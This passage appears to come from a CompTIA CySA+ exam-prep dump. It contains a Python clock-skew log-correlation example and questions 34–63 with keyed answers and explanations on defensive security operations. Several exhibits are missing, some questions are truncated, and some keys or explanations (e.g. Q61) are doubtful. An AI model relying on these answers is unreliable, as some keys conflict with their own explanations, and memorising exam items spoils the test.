compliance and ...
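When one source is NTP-synchronized and the other is not, the analyst still has to correlate the two logs. The usual approach, shown here as an added example (not from the exam guide), is to match events that both sources saw (the same outbound connection), take the median timestamp difference as the host's clock offset, and shift the host's timestamps onto the firewall's timeline before correlating. Both logs are constructed samples in assumed formats; the 43-minute offset is the one from the question.

```python
"""Estimate and correct clock skew between a firewall log and a host log."""
import re
from datetime import datetime, timedelta, timezone
from statistics import median
from typing import Dict, Tuple

Key = Tuple[str, str]  # (source port, "dst_ip:dst_port") identifies one connection

# Constructed firewall log (NTP-synchronized, UTC): "<ISO8601Z> ALLOW src:port -> dst:port"
FIREWALL_LOG = """\
2024-03-05T14:02:11Z ALLOW 10.0.0.7:51512 -> 203.0.113.10:443
2024-03-05T14:02:40Z ALLOW 10.0.0.7:51513 -> 203.0.113.10:443
2024-03-05T14:03:05Z ALLOW 10.0.0.7:51514 -> 198.51.100.22:8443
"""
# Constructed host log (no NTP, local clock running 43 minutes slow)
HOST_LOG = """\
2024-03-05T13:19:11 NetConnect pid=4412 sport=51512 dst=203.0.113.10:443
2024-03-05T13:19:40 NetConnect pid=4412 sport=51513 dst=203.0.113.10:443
2024-03-05T13:20:05 NetConnect pid=7780 sport=51514 dst=198.51.100.22:8443
"""

FW_RE = re.compile(r"^(\S+) ALLOW (\S+):(\d+) -> (\S+:\d+)$")
HOST_RE = re.compile(r"^(\S+) NetConnect pid=(\d+) sport=(\d+) dst=(\S+)$")


def parse_firewall(text: str) -> Dict[Key, datetime]:
    """Map each connection to its UTC timestamp as seen by the firewall."""
    out: Dict[Key, datetime] = {}
    for line in text.splitlines():
        m = FW_RE.match(line)
        if m:
            ts = datetime.strptime(m.group(1), "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)
            out[(m.group(3), m.group(4))] = ts
    return out


def parse_host(text: str) -> Dict[Key, datetime]:
    """Map each connection to the host's own timestamp (naive, so treated as UTC for arithmetic)."""
    out: Dict[Key, datetime] = {}
    for line in text.splitlines():
        m = HOST_RE.match(line)
        if m:
            ts = datetime.strptime(m.group(1), "%Y-%m-%dT%H:%M:%S").replace(tzinfo=timezone.utc)
            out[(m.group(3), m.group(4))] = ts
    return out


def estimate_offset(fw: Dict[Key, datetime], host: Dict[Key, datetime]) -> Tuple[timedelta, int]:
    """Median of (firewall time - host time) over matched connections, plus the match count."""
    diffs = [fw[k] - host[k] for k in fw if k in host]
    if not diffs:
        raise ValueError("no matching connections between the two logs")
    secs = median(d.total_seconds() for d in diffs)
    return timedelta(seconds=secs), len(diffs)


def corrected_host_times(host: Dict[Key, datetime], offset: timedelta) -> Dict[Key, datetime]:
    """Shift host timestamps onto the firewall's (NTP) timeline."""
    return {k: v + offset for k, v in host.items()}


if __name__ == "__main__":
    fw, host = parse_firewall(FIREWALL_LOG), parse_host(HOST_LOG)
    offset, n = estimate_offset(fw, host)
    print(f"host clock offset: {offset} (from {n} matched connections)")
    for k, t in corrected_host_times(host, offset).items():
        print(k, "host(corrected) =", t.isoformat(), "firewall =", fw[k].isoformat())
```

The median is used rather than the mean so that one mismatched or retransmitted connection does not skew the estimate; an offset that is a whole number of hours points to a time-zone difference (option C's scenario), while an odd value such as 43 minutes points to a drifting, unsynchronized clock.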

QUESTION 34
Which of the following threat-modeling procedures is in the OWASP Web Security Testing Guide?

A. Review of security requirements
B. Compliance checks
C. Decomposing the application
D. Security by design

Correct Answer: C
Explanation

Explanation/Reference:
The OWASP Web Security Testing Guide (WSTG) includes a section on threat modeling, which is a
structured approach to identify, quantify, and address the security risks associated with an application. The
first step in the threat modeling process is decomposing the application, which involves creating use
cases, identifying entry points, assets, trust levels, and data flow diagrams for the application. This helps to
understand the application and how it interacts with external entities, as well as to identify potential threats
and vulnerabilities [1]. The other options are not part of the OWASP WSTG threat modeling process.

QUESTION 35
Which of the following techniques would be best to provide the necessary assurance for embedded
software that drives centrifugal pumps at a power plant?

A. Containerization
B. Manual code reviews
C. Static and dynamic analysis
D. Formal methods

Correct Answer: D
Explanation

Explanation/Reference:
According to the CompTIA CySA+ Study Guide: Exam CS0-003, 3rd Edition [1], the best technique to
provide the necessary assurance for embedded software that drives centrifugal pumps at a power plant is
formal methods. Formal methods are a rigorous and mathematical approach to software development and
verification, which can ensure the correctness and reliability of critical software systems. Formal methods
can be used to specify, design, implement, and verify embedded software using formal languages, logics,
and tools [1].
Containerization, manual code reviews, and static and dynamic analysis are also useful techniques for
software assurance, but they are not as rigorous or comprehensive as formal methods. Containerization is
a method of isolating and packaging software applications with their dependencies, which can improve
security, portability, and scalability. Manual code reviews are a process of examining the source code of a
software program by human reviewers, which can help identify errors, vulnerabilities, and compliance
issues. Static and dynamic analysis are techniques of testing and evaluating software without executing it
(static) or while executing it (dynamic), which can help detect bugs, defects, and performance issues [1].

QUESTION 36
An analyst is evaluating a vulnerability management dashboard. The analyst sees that a previously
remediated vulnerability has reappeared on a database server. Which of the following is the most likely
cause?

A. The finding is a false positive and should be ignored.
B. A rollback had been executed on the instance.
C. The vulnerability scanner was configured without credentials.
D. The vulnerability management software needs to be updated.

Correct Answer: B
Explanation

Explanation/Reference:
A rollback had been executed on the instance. If a database server is restored to a previous state, it may
reintroduce a vulnerability that was previously fixed. This can happen due to backup and recovery
operations, configuration changes, or software updates. A rollback can undo the patching or mitigation
actions that were applied to remediate the vulnerability. References: Vulnerability Remediation: It's Not
Just Patching, Section: The Remediation Process; Vulnerability assessment for SQL Server, Section:
Remediation

QUESTION 37
A security analyst reviews the following results of a Nikto scan:

Which of the following should the security administrator investigate next?

A. tiki
B. phpList
C. shtml.exe
D. sshome

Correct Answer: C
Explanation

Explanation/Reference:
Explanation: The security administrator should investigate shtml.exe next, as it is a potential vulnerability
that allows remote code execution on the web server. Nikto scan results indicate that the web server is
running Apache on Windows, and that the shtml.exe file is accessible in the /scripts/ directory. This file is
part of the Server Side Includes (SSI) feature, which allows dynamic content generation on web pages.
However, if the SSI feature is not configured properly, it can allow attackers to execute arbitrary commands
on the web server by injecting malicious code into the URL or the web page [1][2]. Therefore, the security
administrator should check the SSI configuration and permissions, and remove or disable the shtml.exe file
if it is not needed. References: Nikto-Penetration testing.
Introduction, Web application scanning with Nikto

QUESTION 38
Which of the following is a nation-state actor least likely to be concerned with?

A. Detection by MITRE ATT&CK framework.
B. Detection or prevention of reconnaissance activities.
C. Examination of its actions and objectives.
D. Forensic analysis for legal action of the actions taken

Correct Answer: D
Explanation

Explanation/Reference:
Explanation: A nation-state actor is a group or individual that conducts cyberattacks on behalf of a
government or a political entity. They are usually motivated by national interests, such as espionage,
sabotage, or influence operations. They are often highly skilled, resourced, and persistent, and they
operate with the protection or support of their state sponsors. Therefore, they are less likely to be
concerned with the forensic analysis for legal action of their actions, as they are unlikely to face
prosecution or extradition in their own country or by international law. They are more likely to be concerned
with the detection by the MITRE ATT&CK framework, which is a knowledge base of adversary tactics and
techniques based on real-world observations. The MITRE ATT&CK framework can help defenders identify,
prevent, and respond to cyberattacks by nation-state actors. They are also likely to be concerned with the
detection or prevention of reconnaissance activities, which are the preliminary steps of cyberattacks that
involve gathering information about the target, such as vulnerabilities, network topology, or user
credentials. Reconnaissance activities can expose the presence, intent, and capabilities of the attackers,
and allow defenders to take countermeasures. Finally, they are likely to be concerned with the examination
of their actions and objectives, which can reveal their motives, strategies, and goals, and help defenders
understand their threat profile and attribution.
References:
1: MITRE ATT&CK®
2: What is the MITRE ATT&CK Framework? | IBM
3: MITRE ATT&CK | MITRE
4: Cyber Forensics Explained: Reasons, Phases & Challenges of Cyber Forensics | Splunk
5: Digital Forensics: How to Identify the Cause of a Cyber Attack - G2

QUESTION 39
A vulnerability management team found four major vulnerabilities during an assessment and needs to
provide a report for the proper prioritization for further mitigation. Which of the following vulnerabilities
should have the highest priority for the mitigation process?

A. A vulnerability that has related threats and IoCs, targeting a different industry
B. A vulnerability that is related to a specific adversary campaign, with IoCs found in the SIEM
C. A vulnerability that has no adversaries using it or associated IoCs
D. A vulnerability that is related to an isolated system, with no IoCs

Correct Answer: B
Explanation

Explanation/Reference:
A vulnerability that is related to a specific adversary campaign, with IoCs found in the SIEM, should have
the highest priority for the mitigation process. This is because it indicates that the vulnerability is actively
being exploited by a known threat actor, and that the organization's security monitoring system has
detected signs of compromise. This poses a high risk of data breach, service disruption, or other adverse
impacts. References:
How to Prioritize Vulnerabilities Effectively: Vulnerability Prioritization Explained, Section:
How to prioritize vulnerabilities step by step to avoid drowning in sea of problems; CompTIA CySA+ Study
Guide: Exam CS0-003, 3rd Edition, Chapter 4: Security Operations and Monitoring, page 156.

QUESTION 40
During an incident, some IoCs of possible ransomware contamination were found in a group of servers in a
segment of the network. Which of the following steps should be taken next?

A. Isolation
B. Remediation
C. Reimaging
D. Preservation

Correct Answer: A
Explanation

Explanation/Reference:
Explanation: Isolation is the first step to take after detecting some indicators of compromise (IoCs) of
possible ransomware contamination. Isolation prevents the ransomware from spreading to other servers or
segments of the network, and allows the security team to investigate and contain the incident. Isolation can
be done by disconnecting the infected servers from the network, blocking the malicious traffic, or applying
firewall rules [1][2].
References: 10 Things You Should Do After a Ransomware Attack, How to Recover from a Ransomware
Attack: A Step-by-Step Guide

QUESTION 41
Which of the following entities should an incident manager work with to ensure correct processes are
adhered to when communicating incident reporting to the general public, as a best practice? (Select two).

A. Law enforcement
B. Governance
C. Legal
D. Manager
E. Public relations
F. Human resources

Correct Answer: CE
Explanation

Explanation/Reference:
An incident manager should work with the legal and public relations entities to ensure correct processes
are adhered to when communicating incident reporting to the general public, as a best practice. The legal
entity can provide guidance on the legal implications and obligations of disclosing the incident, such as
compliance with data protection laws, contractual obligations, and liability issues. The public relations entity
can help craft the appropriate message and tone for the public communication, as well as manage the
reputation and image of the organization in the aftermath of the incident. These two entities can help the
incident manager balance the need for transparency and accountability with the need for confidentiality
and security [1][2]. References: Incident Communication Templates, Incident Management: Processes, Best
Practices & Tools - Atlassian

QUESTION 42
A security analyst is reviewing events that occurred during a possible compromise. The analyst obtains the
following log:
Which of the following is most likely occurring, based on the events in the log?

A. An adversary is attempting to find the shortest path of compromise.
B. An adversary is performing a vulnerability scan.
C. An adversary is escalating privileges.
D. An adversary is performing a password stuffing attack.

Correct Answer: B
Explanation

Explanation/Reference:
Based on the events in the log, the most likely occurrence is that an adversary is performing a vulnerability
scan. The log shows LDAP read operations and EDR enumerating local groups, which are indicative of an
adversary scanning the system to find vulnerabilities or sensitive information. The final entry shows SMB
connection attempts to multiple hosts from a single host, which could be a sign of network discovery or
lateral movement. References: CompTIA CySA+ Study Guide: Exam CS0-003, 3rd Edition, Chapter 4:
Security Operations and Monitoring, page 161; Monitor logs from vulnerability scanners, Section: Reports
on Nessus vulnerability data.

QUESTION 43
Which of the following would an organization use to develop a business continuity plan?

A. A diagram of all systems and interdependent applications
B. A repository for all the software used by the organization
C. A prioritized list of critical systems defined by executive leadership
D. A configuration management database in print at an off-site location

Correct Answer: C
Explanation

Explanation/Reference:
A prioritized list of critical systems defined by executive leadership is the best option to use to develop a
business continuity plan. A business continuity plan (BCP) is a system of prevention and recovery from
potential threats to a company. The plan ensures that personnel and assets are protected and are able to
function quickly in the event of a disaster [1]. A BCP should include a business impact analysis, which
identifies the critical systems and processes that are essential for the continuity of the business operations,
and the potential impacts of their disruption [2]. The executive leadership should be involved in defining the
critical systems and their priorities, as they have the strategic vision and authority to make decisions that
affect the whole organization [3]. A diagram of all systems and interdependent applications, a repository for
all the software used by the organization, and a configuration management database in print at an off-site
location are all useful tools for documenting and managing the IT infrastructure, but they are not sufficient
to develop a comprehensive BCP that covers all aspects of the business continuity [4]. References: What Is
a Business Continuity Plan (BCP), and How Does It Work?, Business continuity plan (BCP) in 8 steps, with
templates, Business continuity planning | Business Queensland, Understanding the Essentials of a
Business Continuity Plan

QUESTION 44
When investigating a potentially compromised host, an analyst observes that the process BGInfo.exe (PID
1024), a Sysinternals tool used to create desktop backgrounds containing host details, has been running for
over two days. Which of the following activities will provide the best insight into this potentially malicious
process, based on the anomalous behavior?

A. Changes to system environment variables
B. SMB network traffic related to the system process
C. Recent browser history of the primary user
D. Activities taken by PID 1024

Correct Answer: D
Explanation

Explanation/Reference:
Explanation: The activities taken by the process with PID 1024 will provide the best insight into this
potentially malicious process, based on the anomalous behavior. BGInfo.exe is a legitimate tool that
displays system information on the desktop background, but it can also be used by attackers to gather
information about the compromised host or to disguise malicious processes [1][2]. By monitoring the activities
of PID 1024, such as the files it accesses, the network connections it makes, or the commands it executes,
the analyst can determine if the process is benign or malicious.
References: bginfo.exe Windows process - What is it?, What is bginfo.exe? Is it Safe or a Virus? How to
remove or fix it

QUESTION 45
A security analyst is reviewing the logs of a web server and notices that an attacker has attempted to
exploit a SQL injection vulnerability. Which of the following tools can the analyst use to analyze the attack
and prevent future attacks?

A. A web application firewall
B. A network intrusion detection system
C. A vulnerability scanner
D. A web proxy

Correct Answer: A
Explanation

Explanation/Reference:
Explanation: A web application firewall (WAF) is a tool that can protect web servers from attacks such as
SQL injection, cross-site scripting, and other web-based threats. A WAF can filter, monitor, and block
malicious HTTP traffic before it reaches the web server. A WAF can also be configured with rules and
policies to detect and prevent specific types of attacks.
References: CompTIA CySA+ Study Guide: Exam CS0-002, 2nd Edition, Chapter 3, "Security Architecture
and Tool Sets", page 91; CompTIA CySA+ Certification Exam Objectives Version 4.0, Domain 1.0 "Threat
and Vulnerability Management", Objective 1.2 "Given a scenario, analyze the results of a network
reconnaissance", Sub-objective "Web application attacks", page 9 CompTIA CySA+ Study Guide: Exam
CS0-002, 2nd Edition : CompTIA CySA+ Certification Exam Objectives Version 4.0.pdf)

QUESTION 46
An attacker recently gained unauthorized access to a financial institution's database, which contains
confidential information. The attacker exfiltrated a large amount of data before being detected and blocked.
A security analyst needs to complete a root cause analysis to determine how the attacker was able to gain
access. Which of the following should the analyst perform first?

A. Document the incident and any findings related to the attack for future reference.
B. Interview employees responsible for managing the affected systems.
C. Review the log files that record all events related to client applications and user access.
D. Identify the immediate actions that need to be taken to contain the incident and minimize damage.

Correct Answer: C
Explanation

Explanation/Reference:
Explanation: In a root cause analysis following unauthorized access, the initial step is usually to review
relevant log files. These logs can provide critical information about how and when the attacker gained
access. The first step in a root cause analysis after a data breach is typically to review the logs. This helps
the analyst understand how the attacker gained access by providing a detailed record of all events,
including unauthorized or abnormal activities. Documenting the incident, interviewing employees, and
identifying immediate containment actions are important steps, but they usually follow the initial log review.

QUESTION 47
An analyst discovers unusual outbound connections to an IP that was previously blocked at the web proxy
and firewall. Upon further investigation, it appears that the proxy and firewall rules that were in place were
removed by a service account that is not recognized. Which of the following parts of the Cyber Kill Chain
does this describe?

A. Delivery
B. Command and control
C. Reconnaissance
D. Weaponization

Correct Answer: B
Explanation

Explanation/Reference:
Explanation: The Command and Control stage of the Cyber Kill Chain describes the communication
between the attacker and the compromised system. The attacker may use this channel to send
commands, receive data, or update malware. If the analyst discovers unusual outbound connections to an
IP that was previously blocked, it may indicate that the attacker has established a command and control
channel and bypassed the security controls. References: Cyber Kill Chain | Lockheed Martin

QUESTION 48
A security analyst received an alert regarding multiple successful MFA log-ins for a particular user. When
reviewing the authentication logs, the analyst sees the following:

Which of the following are most likely occurring, based on the MFA logs? (Select two).

A. Dictionary attack
B. Push phishing
C. Impossible geo-velocity
D. Subscriber identity module swapping
E. Rogue access point
F. Password spray

Correct Answer: BC
Explanation

Explanation/Reference:
Explanation: C. Impossible geo-velocity: This is an event where a single user's account is accessed from
different geographical locations within a timeframe that is impossible for normal human travel. In the log,
we can see that the user "jdoe" is accessing from the United States and then within a few minutes from
Russia, which is practically impossible to achieve without the use of some form of automated system or if
the account credentials are being used by different individuals in different locations.

B. Push phishing: This could also be an indication of push phishing, where the user is tricked into approving
a multi-factor authentication request that they did not initiate. This is less clear from the logs directly, but it
could be inferred if the user is receiving MFA requests that they are not initiating and are being approved
without their genuine desire to access the resources.

QUESTION 49
Which of the following should be updated after a lessons-learned review?

A. Disaster recovery plan
B. Business continuity plan
C. Tabletop exercise
D. Incident response plan

Correct Answer: D
Explanation

Explanation/Reference:
Explanation: A lessons-learned review is a process of evaluating the effectiveness and efficiency of the
incident response plan after an incident or an exercise. The purpose of the review is to identify the
strengths and weaknesses of the incident response plan, and to update it accordingly to improve the future
performance and resilience of the organization. Therefore, the incident response plan should be updated
after a lessons-learned review. References: The answer was based on the NCSC CAF guidance from the
National Cyber Security Centre, which states: "You should use post-incident and post-exercise reviews to
actively reduce the risks associated with the same, or similar, incidents happening in future. Lessons
learned can inform any aspect of your cyber security, including: System configuration; Security monitoring
and reporting; Investigation procedures; Containment/recovery strategies"

QUESTION 50
A manufacturer has hired a third-party consultant to assess the security of an OT network that includes
both fragile and legacy equipment.

Which of the following must be considered to ensure the consultant does no harm to operations?

A. Employing Nmap Scripting Engine scanning techniques
B. Preserving the state of PLC ladder logic prior to scanning
C. Using passive instead of active vulnerability scans
D. Running scans during off-peak manufacturing hours

Correct Answer: C
Explanation

Explanation/Reference:
Explanation: In environments with fragile and legacy equipment, passive scanning is preferred to prevent
any potential disruptions that active scanning might cause.

When assessing the security of an Operational Technology (OT) network, especially one with fragile and
legacy equipment, it's crucial to use passive instead of active vulnerability scans. Active scanning can
sometimes disrupt the operation of sensitive or older equipment. Passive scanning listens to network traffic
without sending probing requests, thus minimizing the risk of disruption.

QUESTION 51
A security analyst has found a moderate-risk item in an organization's point-of-sale application. The
organization is currently in a change freeze window and has decided that the risk is not high enough to
correct at this time. Which of the following inhibitors to remediation does this scenario illustrate?

A. Service-level agreement
B. Business process interruption
C. Degrading functionality
D. Proprietary system

Correct Answer: B
Explanation

Explanation/Reference:
Business process interruption is the inhibitor to remediation that this scenario illustrates. Business process
interruption is when the remediation of a vulnerability or an incident requires the disruption or suspension
of a critical or essential business process, such as the point-of-sale application. This can cause
operational, financial, or reputational losses for the organization, and may outweigh the benefits of the
remediation. Therefore, the organization may decide to postpone or avoid the remediation until a more
convenient time, such as a change freeze window, which is a period of time when no changes are allowed
to the IT environment [1][2]. Service-level agreement, degrading functionality, and proprietary system are
other possible inhibitors to remediation, but they are not relevant to this scenario. Service-level agreement
is when the remediation of a vulnerability or an incident violates or affects the contractual obligations or
expectations of the service provider or the customer. Degrading functionality is when the remediation of a
vulnerability or an incident reduces or impairs the performance or usability of a system or an application.
Proprietary system is when the remediation of a vulnerability or an incident involves a system or an
application that is owned or controlled by a third party, and the organization has limited or no access or
authority to modify it [3]. References: Inhibitors to Remediation - SOC Ops Simplified, Remediation
Inhibitors - CompTIA CySA+, Information security Vulnerability Management Report (Remediation...

QUESTION 52
A payroll department employee was the target of a phishing attack in which an attacker impersonated a
department director and requested that direct deposit information be updated to a new account. Afterward,
a deposit was made into the unauthorized account. Which of the following is one of the first actions the
incident response team should take when they receive notification of the attack?

A. Scan the employee's computer with virus and malware tools.
B. Review the actions taken by the employee and the email related to the event.
C. Contact human resources and recommend the termination of the employee.
D. Assign security awareness training to the employee involved in the incident.

Correct Answer: B
Explanation

Explanation/Reference:
Explanation: In case of a phishing attack, it's crucial to review what actions were taken by the employee
and analyze the phishing email to understand its nature and impact. References: CompTIA CySA+ Study
Guide: Exam CS0-003, 3rd Edition, Chapter 6, page 246; CompTIA CySA+ CS0-003 Certification Study
Guide, Chapter 6, page 255.

QUESTION 53
A security analyst is responding to an incident that involves a malicious attack on a network data closet.
Which of the following best explains how an analyst should properly document the incident?

A. Back up the configuration file for all network devices
B. Record and validate each connection
C. Create a full diagram of the network infrastructure
D. Take photos of the impacted items

Correct Answer: D
Explanation

Explanation/Reference:
Explanation: When documenting a physical incident in a network data closet, taking photos provides a
clear and immediate record of the situation, which is essential for thorough incident documentation and
subsequent investigation. Proper documentation of an incident in a data closet should include taking
photos of the impacted items. This provides visual evidence and helps in understanding the physical
context of the incident, which is crucial for a thorough investigation. Backing up configuration files,
recording connections, and creating network diagrams, while important, are not the primary means of
documenting the physical aspects of an incident.

QUESTION 54
An incident response analyst is investigating the root cause of a recent malware outbreak. Initial binary
analysis indicates that this malware disables host security services and performs cleanup routines on its
infected hosts, including deletion of the initial dropper and removal of event log entries and prefetch files from
the host. Which of the following data sources would most likely reveal evidence of the root cause? (Select
two).

A. Creation time of dropper
B. Registry artifacts
C. EDR data
D. Prefetch files
E. File system metadata
F. Sysmon event log

Correct Answer: BC
Explanation

Explanation/Reference:
Explanation: Registry artifacts and EDR data are two data sources that can provide valuable information
about the root cause of a malware outbreak. Registry artifacts can reveal changes made by the malware to
the system configuration, such as disabling security services, modifying startup items, or creating
persistence mechanisms [1]. EDR data can capture the behavior and network activity of the malware, such
as the initial infection vector, the command and control communication, or the lateral movement [2]. These
data sources can help the analyst identify the malware family, the attack technique, and the threat actor
behind the outbreak.
References: Malware Analysis | CISA, Malware Analysis: Steps & Examples - CrowdStrike

QUESTION 55
Which of the following would likely be used to update a dashboard that integrates.....?

A. Webhooks
B. Extensible Markup Language
C. Threat feed combination
D. JavaScript Object Notation

Correct Answer: D
Explanation

Explanation/Reference:
Explanation: JavaScript Object Notation (JSON) is commonly used for transmitting data in web
applications and would be suitable for updating dashboards that integrate various data sources. It's
lightweight and easy to parse and generate.

QUESTION 56
A Chief Information Security Officer wants to implement security by design, starting ...... vulnerabilities,
including SQL injection, FRI, XSS, etc. Which of the following would most likely meet the requirement?

A. Reverse engineering
B. Known environment testing
C. Dynamic application security testing
D. Code debugging

Correct Answer: C
Explanation

Explanation/Reference:
Explanation: Dynamic Application Security Testing (DAST) is used to detect vulnerabilities in running
applications, including common issues like SQL injection, FRI, XSS, etc. It aligns with the goal of
implementing security by design.

QUESTION 57
An analyst is designing a message system for a bank. The analyst wants to include a feature that allows
the recipient of a message to prove to a third party that the message came from the sender.

Which of the following information security goals is the analyst most likely trying to achieve?

A. Non-repudiation
B. Authentication
C. Authorization
D. Integrity

Correct Answer: A
Explanation

Explanation/Reference:
Explanation: Non-repudiation ensures that a message sender cannot deny the authenticity of their sent
message. This is crucial in banking communications for legal and security reasons. The goal of allowing a
message recipient to prove the message's origin is non-repudiation. This ensures that the sender cannot
deny the authenticity of their message. Non-repudiation is a fundamental aspect of secure messaging
systems, especially in banking and financial communications.

QUESTION 58
A security team identified several rogue Wi-Fi access points during the most recent network scan. The
network scans occur once per quarter. Which of the following controls would best allow the organization to
identify rogue devices more quickly?

A. Implement a continuous monitoring policy.
B. Implement a BYOD policy.
C. Implement a portable wireless scanning policy.
D. Change the frequency of network scans to once per month.

Correct Answer: A
Explanation

Explanation/Reference:
The best control to allow the organization to identify rogue devices more quickly is A. Implement a
continuous monitoring policy. A continuous monitoring policy is a set of procedures and tools that enable
an organization to detect and respond to unauthorized or anomalous activities on its network in real time or
near real time. A continuous monitoring policy can help identify rogue access points as soon as they
appear on the network, rather than waiting for quarterly or monthly scans. A continuous monitoring policy
can also help improve the overall security posture and compliance of the organization by providing timely
and accurate information about its network assets, vulnerabilities, threats, and incidents [1].

QUESTION 59
A security analyst reviews the following Arachni scan results for a web application that stores PII data:
Which of the following should be remediated first?

A. SQL injection
B. RFI
C. XSS
D. Code injection

Correct Answer: A
Explanation

Explanation/Reference:
SQL injection should be remediated first, as it is a high-severity vulnerability that can allow an attacker to
execute arbitrary SQL commands on the database server and access, modify, or delete sensitive data,
including PII. According to the Arachni scan results, there are two instances of SQL injection and three
instances of blind SQL injection (two timing attacks and one differential analysis) in the web application.
These vulnerabilities indicate that the web application does not properly validate or sanitize the user input
before passing it to the database server, and thus exposes the database to malicious queries [1][2]. SQL
injection can have serious consequences for the confidentiality, integrity, and availability of the data and
the system, and can also lead to further attacks, such as privilege escalation, data exfiltration, or remote
code execution [3][4]. Therefore, SQL injection should be the highest priority for remediation, and the web
application should implement input validation, parameterized queries, and the least privilege principle to
prevent SQL injection attacks [5]. References: Web application testing with Arachni | Infosec, How do I
create a generated scan report for PDF in Arachni Web ..., Command line user interface · Arachni/arachni
Wiki · GitHub, SQL Injection - OWASP, Blind SQL Injection - OWASP, SQL Injection Attack:
What is it, and how to prevent it., SQL Injection Cheat Sheet & Tutorial | Veracode

QUESTION 60
An organization has tracked several incidents that are listed in the following table:

Which of the following is the organization's MTTD?

A. 140
B. 150
C. 160
D. 180

Correct Answer: C
Explanation

Explanation/Reference:
The MTTD (Mean Time To Detect) is calculated by averaging the time elapsed in detecting incidents. From
the given data: (180+150+170+140)/4 = 160 minutes. This is the correct answer according to the CompTIA
CySA+ CS0-003 Certification Study Guide [1], Chapter 4, page 161. References: CompTIA CySA+ Study
Guide: Exam CS0-003, 3rd Edition, Chapter 4, page 153; CompTIA CySA+ CS0-003 Certification Study
Guide, Chapter 4, page 161.

QUESTION 61
The Chief Executive Officer (CEO) has notified that a confidential trade secret has been compromised.
Which of the following communication plans should the CEO initiate?

A. Alert department managers to speak privately with affected staff.
B. Schedule a press release to inform other service provider customers of the compromise.
C. Disclose to all affected parties in the Chief Operating Officer for discussion and resolution.
D. Verify legal notification requirements of PII and SPII in the legal and human resource departments.

Correct Answer: A
Explanation

Explanation/Reference:
Explanation: The CEO should initiate an alert to department managers to speak privately with affected
staff. This is because the trade secret is confidential and should not be disclosed to the public. Additionally,
the CEO should verify legal notification requirements of PII and SPII in the legal and human resource
departments to ensure compliance with data protection laws. References: CompTIA CySA+ Study Guide:
Exam CS0-002, 2nd Edition, Chapter 4, "Data Protection and Privacy Practices", page 194; CompTIA
CySA+ Certification Exam Objectives Version 4.0, Domain 4.0 "Compliance and Assessment", Objective
4.1 "Given a scenario, analyze data as part of a security incident", Sub-objective "Data classification
levels", page 23

QUESTION 62
Which of the following best describes the importance of implementing TAXII as part of a threat intelligence
program?

A. It provides a structured way to gain information about insider threats.
B. It proactively facilitates real-time information sharing between the public and private sectors.
C. It exchanges messages in the most cost-effective way and requires little maintenance once
implemented.
D. It is a semi-automated solution to gather threat intelligence about competitors in the same sector.

Correct Answer: B
Explanation

Explanation/Reference:
Explanation: The correct answer is B. It proactively facilitates real-time information sharing between the
public and private sectors.

TAXII, or Trusted Automated eXchange of Intelligence Information, is a standard protocol for sharing cyber
threat intelligence in a standardized, automated, and secure manner. TAXII defines how cyber threat
information can be shared via services and message exchanges, such as discovery, collection
management, inbox, and poll. TAXII is designed to support STIX, or Structured Threat Information
eXpression, which is a standardized language for describing cyber threat information in a readable and
consistent format. Together, STIX and TAXII form a framework for sharing and using threat intelligence,
creating an open-source platform that allows users to search through records containing attack vector
details such as malicious IP addresses, malware signatures, and threat actors [1][2][3].
The importance of implementing TAXII as part of a threat intelligence program is that it proactively
facilitates real-time information sharing between the public and private sectors. By using TAXII,
organizations can exchange cyber threat information with various entities, such as security vendors,
government agencies, industry associations, or trusted groups. TAXII enables different sharing models,
such as hub and spoke, source/subscriber, or peer-to-peer, depending on the needs and preferences of
the information producers and consumers. TAXII also supports different levels of access control,
encryption, and authentication to ensure the security and privacy of the shared information [1][2][3]. By
implementing TAXII as part of a threat intelligence program, organizations can benefit from the following
advantages:
They can receive timely and relevant information about the latest threats and vulnerabilities that may affect
their systems or networks.
They can leverage the collective knowledge and experience of other organizations that have faced similar
or related threats.
They can improve their situational awareness and threat detection capabilities by correlating and analyzing
the shared information.
They can enhance their incident response and mitigation strategies by applying the best practices and
recommendations from the shared information.
They can contribute to the overall improvement of cyber security by sharing their own insights and
feedback with other organizations [1][2][3].
The other options are incorrect because they do not accurately describe the importance of implementing
TAXII as part of a threat intelligence program. Option A is incorrect because TAXII does not provide a
structured way to gain information about insider threats. Insider threats are malicious activities conducted
by authorized users within an organization, such as employees, contractors, or partners. Insider threats
can be detected by using various methods, such as user behavior analysis, data loss prevention, or
anomaly detection. However, TAXII is not designed to collect or share information about insider threats
specifically. TAXII is more focused on external threats that originate from outside sources, such as
hackers, cybercriminals, or nation-states4. Option C is incorrect because TAXII does not exchange
messages in the most cost- effective way and requires little maintenance once implemented. TAXII is a
protocol that defines how messages are exchanged, but it does not specify the cost or maintenance of the
exchange. The cost and maintenance of implementing TAXII depend on various factors, such as the type
and number of services used, the volume and frequency of data exchanged, the security and reliability
requirements of the exchange, and the availability and compatibility of existing tools and platforms.
Implementing TAXII may require significant resources and efforts from both the information producers and
consumers to ensure its functionality and performance5.
Option D is incorrect because TAXII is not a semi-automated solution to gather threat intelligence about
competitors in the same sector. TAXII is a fully automated solution that enables the exchange of threat
intelligence among various entities across different sectors. TAXII does not target or collect information
about specific competitors in the same sector. Rather, it aims to foster collaboration and cooperation
among organizations that share common interests or goals in cyber security. Moreover, gathering threat
intelligence about competitors in the same sector may raise ethical and legal issues that are beyond the
scope of TAXII.
References:
1 What is STIX/TAXII? | Cloudflare
2 What Are STIX/TAXII Standards? - Anomali Resources 3 What is STIX and TAXII? - EclecticIQ
4 What Is an Insider Threat? Definition & Examples | Varonis 5 Implementing STIX/TAXII - GitHub Pages
[6] Cyber Threat Intelligence: Ethical Hacking vs Unethical Hacking | Infosec

QUESTION 63
A company has the following security requirements:

No public IPs

All data secured at rest

No insecure ports/protocols

After a cloud scan is completed, a security analyst receives reports that several misconfigurations are
putting the company at risk. Given the following cloud scanner output:

Which of the following should the analyst recommend be updated first to meet the security requirements
and reduce risks?

A. VM_PRD_DB
B. VM_DEV_DB
C. VM_DEV_Web02
D. VM_PRD_Web01

Correct Answer: D
Explanation

Explanation/Reference:
Explanation: VM_PRD_Web01 has a public IP address and port 80 (HTTP) open, which violates two of the
three requirements at once: no public IPs and no insecure ports/protocols. Because it is a production
system that is directly reachable from the internet over a cleartext protocol, it carries the most immediate
risk and should be updated first: move it to a private IP (fronted by a load balancer or gateway if it must
serve external users), close port 80, and serve the application over HTTPS (TCP 443) only.
References: CompTIA CySA+ Study Guide: Exam CS0-003, 3rd Edition, Chapter 2: Cloud and Hybrid
Environments, page 67; What is a Public IP Address?; What is Port 80?

